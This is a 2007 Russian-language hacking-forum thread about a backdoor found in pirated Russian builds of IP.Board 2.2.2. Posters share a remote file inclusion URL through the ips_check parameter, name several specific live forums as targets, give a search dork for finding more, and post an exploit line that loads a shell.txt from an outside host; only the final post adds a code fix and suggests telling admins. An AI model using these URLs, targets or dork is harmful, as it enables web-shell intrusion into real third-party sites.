Бэкдор в Ipb 2.2.2 (Русская пиратская версия)

Discussion in 'Песочница' started by Shram-spb, 14 Jul 2007.

Thread Status:
Not open for further replies.
  1. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    Сегодня изучал свой форум на предмет пхп иньекций и наткнулся на бэкдор.. погуглил немного и нашел в сети еше штук 30 таких форумов..
    Как я понял его просто кто-то всунул туда и стал распространять...
    В общем работает тока на IPB 2.2.2 Русская версия (и то не на всех)
    Code:
    http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]
    Как вам, а? :)
     
    6 people like this.
  2. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Работает не везде...
    Просто надо качать нуллы от русского офф.сайта поддержки Ipb
     
  3. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    Не тока в левых Ipb такое есть...
     
  4. Vallez

    Vallez Elder - Старейшина

    Joined:
    25 Dec 2005
    Messages:
    88
    Likes Received:
    19
    Reputations:
    -8
    Shram-spb напиши плз форум где работает для теста.
     
  5. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    Code:
    http://vsecrazy.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[url]
     
    2 people like this.
  6. Vallez

    Vallez Elder - Старейшина

    Joined:
    25 Dec 2005
    Messages:
    88
    Likes Received:
    19
    Reputations:
    -8
    Не работает сайт можно ешё 1 плз.
     
  7. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    Видимо уже кто-то сломал.. или админы проснулись %)

    Вот еще парочка.
    Code:
    http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]
    Code:
    http://www.forum.partisans.com.ua/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=[URL]
     
    2 people like this.
  8. a1ex

    a1ex Banned

    Joined:
    11 Oct 2006
    Messages:
    517
    Likes Received:
    130
    Reputations:
    -13
    Поподробней распиши, обьясни поподробней, ато я чёт не пойму на каких работает и как глянуть что работает.
     
  9. GrAmOzEkA

    GrAmOzEkA Elder - Старейшина

    Joined:
    25 Jun 2006
    Messages:
    234
    Likes Received:
    76
    Reputations:
    29
    Написано же
    вот и подставляй туда свой урл

    Вот пример:

    Code:
    http://antigothic.ru/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://forum.antichat.ru/showthread.php
     
  10. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    Code:
    dork: "Русская версия IP.Board 2.2.2 © 2007  IPS, Inc."
    
    exploit: http://site/forum/index.php?s=&act=profile&CODE=friends_list_popup&ips_check=http://4elovek.spb.ru/shell.txt
    
    
    Куда уж подробнее??
    Работает на чьем-то конкретном null'e.. но на чьем я пока не выяснил..
    Ясно, что версия пиратская.. если на главной странице внизу написано, что "Лицензия для...", то адназначно не прокатит..
    Ищите.. я много таких нашел.. но ломать не советую.. ничего инетерсного там нет, посещаемость таких форумов как правило мала... так что лучше проверять дырку и сообщать админам... фиксится так:

    /source/action_public/profile.php
    строка 885:

    Code:
    if ( $chk )
    {
             @include ($chk);
             exit();
    }
    
    Меняем на:

    Code:
    if ( $chk )
    {
       echo "Fuck you, Spilberg... Fixed by 5hr4M...";
       exit();
    }
    
     
Thread Status:
Not open for further replies.